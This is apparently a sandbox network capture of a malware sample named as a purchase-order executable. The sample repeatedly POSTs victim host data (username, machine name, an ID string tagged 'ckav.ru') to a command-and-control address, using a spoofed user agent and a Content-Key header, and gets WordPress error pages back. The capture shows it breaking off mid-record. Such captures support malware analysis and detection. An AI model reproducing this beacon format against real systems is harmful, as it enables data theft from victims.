Aug 29, 2024 12:03:52.278399944 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:03:52.278438091 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49745	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:52.438359976 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:52.443389893 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:54.762449980 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:52 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:54.762466908 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:54.762478113 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49746	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:54.909610987 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:54.915657997 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:57.235742092 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:55 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:57.235768080 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:57.235780001 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49747	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:57.388792038 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:57.393910885 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:59.722035885 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:57 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:59.722048998 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:59.722059011 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49748	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:59.874196053 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:59.879049063 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:02.225591898 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:00 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:02.225614071 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:02.225626945 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49749	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:02.372833014 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:02.379636049 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:04.631860018 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:02 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:04.631895065 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:04:04.631906033 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:04.631911993 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49750	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:04.778196096 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:04.783248901 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:07.063370943 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:05 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 